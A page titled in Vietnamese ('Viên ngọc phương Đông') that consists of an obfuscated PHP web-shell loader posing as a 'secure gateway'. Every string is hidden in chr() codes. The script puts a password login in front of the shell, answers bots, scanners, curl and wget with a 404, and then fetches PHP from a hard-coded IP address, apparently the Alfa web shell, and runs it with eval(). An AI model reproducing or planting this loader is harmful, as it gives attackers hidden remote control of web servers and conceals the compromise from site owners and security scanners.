Viên ngọc phương Đông

<?php
/* 9f3c7e2a8b1d4f6e - secure gateway v4 */
@error_reporting(0);
@ini_set('display_errors', 0);

$GLOBALS['_conf'] = [
    chr(104).chr(97).chr(115).chr(104) => '6effe27d6aad2e8a76dc35373aeae74a',
    chr(117).chr(114).chr(108) => chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(49).chr(56).chr(53).chr(46).chr(49).chr(50).chr(56).chr(46).chr(50).chr(50).chr(55).chr(46).chr(49).chr(53).chr(55).chr(47).chr(65).chr(76).chr(76).chr(45).chr(83).chr(72).chr(69).chr(76).chr(76).chr(47).chr(114).chr(97).chr(119).chr(45).chr(107).chr(101).chr(114).chr(47).chr(97).chr(108).chr(102).chr(97).chr(46).chr(116).chr(120).chr(116)
];

@session_start();

if(isset($_GET[chr(108).chr(111).chr(103)])){
    @session_destroy();
    $loc = @strtok($_SERVER[chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(95).chr(85).chr(82).chr(73)], chr(63));
    @header(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).$loc);
    exit;
}

if(isset($_POST[chr(112)]) && !empty($_POST[chr(112)])){
    $inp = @md5(@trim($_POST[chr(112)]));
    if($inp === $GLOBALS['_conf'][chr(104).chr(97).chr(115).chr(104)]){
        $_SESSION[chr(97).chr(107)] = $GLOBALS['_conf'][chr(104).chr(97).chr(115).chr(104)];
        $_SESSION[chr(108).chr(116)] = @time();
        $loc = @strtok($_SERVER[chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(95).chr(85).chr(82).chr(73)], chr(63));
        @header(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).$loc);
        exit;
    }else{
        @usleep(rand(500000,1500000));
        $GLOBALS['_err'] = 1;
    }
}

if(!isset($_SESSION[chr(97).chr(107)]) || $_SESSION[chr(97).chr(107)] !== $GLOBALS['_conf'][chr(104).chr(97).chr(115).chr(104)]){
    $ua = isset($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82).chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)]) ? $_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82).chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)] : '';
    $block = [chr(98).chr(111).chr(116), chr(99).chr(114).chr(97).chr(119).chr(108).chr(101).chr(114), chr(115).chr(112).chr(105).chr(100).chr(101).chr(114), chr(115).chr(99).chr(97).chr(110).chr(110).chr(101).chr(114), chr(99).chr(117).chr(114).chr(108), chr(119).chr(103).chr(101).chr(116)];
    foreach($block as $b){
        if(@stripos($ua, $b) !== false){
            @http_response_code(404);
            exit;
        }
    }
    
    $err_display = isset($GLOBALS['_err']) ? '<div style="color:#ff6b6b;margin-top:16px;text-align:center">Access Denied</div>' : '';
    
    echo '<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>'.chr(65).chr(117).chr(116).chr(104).chr(101).chr(110).chr(116).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).'</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{background:#0a0a0a;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif;display:flex;justify-content:center;align-items:center;min-height:100vh;padding:20px}
.container{background:linear-gradient(145deg,#141414,#0f0f0f);padding:32px;border-radius:24px;box-shadow:0 20px 40px rgba(0,0,0,0.4),0 0 0 1px rgba(255,255,255,0.05);width:100%;max-width:360px}
h3{color:#fff;font-size:1.35rem;font-weight:500;margin-bottom:8px;text-align:center}
.sub{color:#888;font-size:0.8rem;text-align:center;margin-bottom:28px}
.input-field{width:100%;padding:14px 16px;background:#1e1e1e;border:1px solid #2e2e2e;border-radius:14px;color:#fff;font-size:1rem;margin-bottom:16px;transition:all 0.2s ease}
.input-field:focus{outline:none;border-color:#ce4242;background:#252525}
.btn{width:100%;padding:14px;background:#ce4242;color:#fff;border:none;border-radius:14px;font-size:1rem;font-weight:600;cursor:pointer;transition:all 0.2s ease}
.btn:hover{background:#b33838;transform:translateY(-1px)}
.footer{text-align:center;margin-top:20px;font-size:0.7rem;color:#555}
</style>
</head>
<body>
<div class="container">
<h3>'.chr(86).chr(101).chr(114).chr(105).chr(102).chr(121).chr(32).chr(65).chr(99).chr(99).chr(101).chr(115).chr(115).'</h3>
<div class="sub">'.chr(69).chr(110).chr(116).chr(101).chr(114).chr(32).chr(99).chr(114).chr(101).chr(100).chr(101).chr(110).chr(116).chr(105).chr(97).chr(108).chr(115).'</div>
<form method="POST" action="">
<input type="password" name="p" class="input-field" placeholder="'.chr(80).chr(97).chr(115).chr(115).chr(119).chr(111).chr(114).chr(100).'" autocomplete="off" required>
<button type="submit" class="btn">'.chr(86).chr(101).chr(114).chr(105).chr(102).chr(121).'</button>
'.$err_display.'
</form>
<div class="footer">'.chr(83).chr(101).chr(99).chr(117).chr(114).chr(101).chr(32).chr(83).chr(121).chr(115).chr(116).chr(101).chr(109).chr(32).chr(118).chr(52).'</div>
</div>
</body>
</html>';
    exit;
}

function _get_remote($url){
    if(!function_exists(chr(99).chr(117).chr(114).chr(108).chr(95).chr(105).chr(110).chr(105).chr(116))){
        return false;
    }
    
    $agents = [
        chr(77).chr(111).chr(122).chr(105).chr(108).chr(108).chr(97).chr(47).chr(53).chr(46).chr(48).chr(32).chr(40).chr(87).chr(105).chr(110).chr(100).chr(111).chr(119).chr(115).chr(32).chr(78).chr(84).chr(32).chr(49).chr(48).chr(46).chr(48).chr(59).chr(32).chr(87).chr(105).chr(110).chr(54).chr(52).chr(59).chr(32).chr(120).chr(54).chr(52).chr(41).chr(32).chr(65).chr(112).chr(112).chr(108).chr(101).chr(87).chr(101).chr(98).chr(75).chr(105).chr(116).chr(47).chr(53).chr(51).chr(55).chr(46).chr(51).chr(54).chr(32).chr(67).chr(104).chr(114).chr(111).chr(109).chr(101).chr(47).chr(49).chr(50).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(48).chr(32).chr(83).chr(97).chr(102).chr(97).chr(114).chr(105).chr(47).chr(53).chr(51).chr(55).chr(46).chr(51).chr(54),
        chr(77).chr(111).chr(122).chr(105).chr(108).chr(108).chr(97).chr(47).chr(53).chr(46).chr(48).chr(32).chr(40).chr(77).chr(97).chr(99).chr(105).chr(110).chr(116).chr(111).chr(115).chr(104).chr(59).chr(32).chr(73).chr(110).chr(116).chr(101).chr(108).chr(32).chr(77).chr(97).chr(99).chr(32).chr(79).chr(83).chr(32).chr(88).chr(32).chr(49).chr(48).chr(95).chr(49).chr(53).chr(95).chr(55).chr(41).chr(32).chr(65).chr(112).chr(112).chr(108).chr(101).chr(87).chr(101).chr(98).chr(75).chr(105).chr(116).chr(47).chr(53).chr(51).chr(55).chr(46).chr(51).chr(54).chr(32).chr(67).chr(104).chr(114).chr(111).chr(109).chr(101).chr(47).chr(49).chr(49).chr(57).chr(46).chr(48).chr(46).chr(48).chr(46).chr(48).chr(32).chr(83).chr(97).chr(102).chr(97).chr(114).chr(105).chr(47).chr(53).chr(51).chr(55).chr(46).chr(51).chr(54)
    ];
    
    $ch = @curl_init();
    @curl_setopt($ch, CURLOPT_URL, $url);
    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    @curl_setopt($ch, CURLOPT_TIMEOUT, 28);
    @curl_setopt($ch, CURLOPT_USERAGENT, $agents[array_rand($agents)]);
    @curl_setopt($ch, CURLOPT_REFERER, isset($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(72).chr(79).chr(83).chr(84)]) ? $_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(72).chr(79).chr(83).chr(84)] : '');
    @curl_setopt($ch, CURLOPT_ENCODING, chr(103).chr(122).chr(105).chr(112).chr(44).chr(32).chr(100).chr(101).chr(102).chr(108).chr(97).chr(116).chr(101));
    @curl_setopt($ch, CURLOPT_HTTPHEADER, [
        chr(65).chr(99).chr(99).chr(101).chr(112).chr(116).chr(58).chr(32).chr(116).chr(101).chr(120).chr(116).chr(47).chr(104).chr(116).chr(109).chr(108).chr(44).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(104).chr(116).chr(109).chr(108).chr(43).chr(120).chr(109).chr(108).chr(44).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(109).chr(108).chr(59).chr(113).chr(61).chr(48).chr(46).chr(57).chr(44).chr(42).chr(47).chr(42).chr(59).chr(113).chr(61).chr(48).chr(46).chr(56),
        chr(65).chr(99).chr(99).chr(101).chr(112).chr(116).chr(45).chr(76).chr(97).chr(110).chr(103).chr(117).chr(97).chr(103).chr(101).chr(58).chr(32).chr(101).chr(110).chr(45).chr(85).chr(83).chr(44).chr(101).chr(110).chr(59).chr(113).chr(61).chr(48).chr(46).chr(57),
        chr(67).chr(111).chr(110).chr(110).chr(101).chr(99).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(107).chr(101).chr(101).chr(112).chr(45).chr(97).chr(108).chr(105).chr(118).chr(101)
    ]);
    
    $res = @curl_exec($ch);
    $code = @curl_getinfo($ch, CURLINFO_HTTP_CODE);
    @curl_close($ch);
    
    return ($code === 200 && !empty($res)) ? $res : false;
}

$data = _get_remote($GLOBALS['_conf'][chr(117).chr(114).chr(108)]);
if($data !== false){
    $data = @ltrim($data, "\xef\xbb\xbf");
    if(@stripos($data, chr(60).chr(63).chr(112).chr(104).chr(112)) !== false || @stripos($data, chr(60).chr(37)) !== false){
        try {
            @ob_start();
            @eval(chr(63).chr(62) . $data);
            @ob_end_flush();
        } catch (Throwable $e) {}
    } else {
        echo $data;
    }
} else {
    @http_response_code(404);

}
?>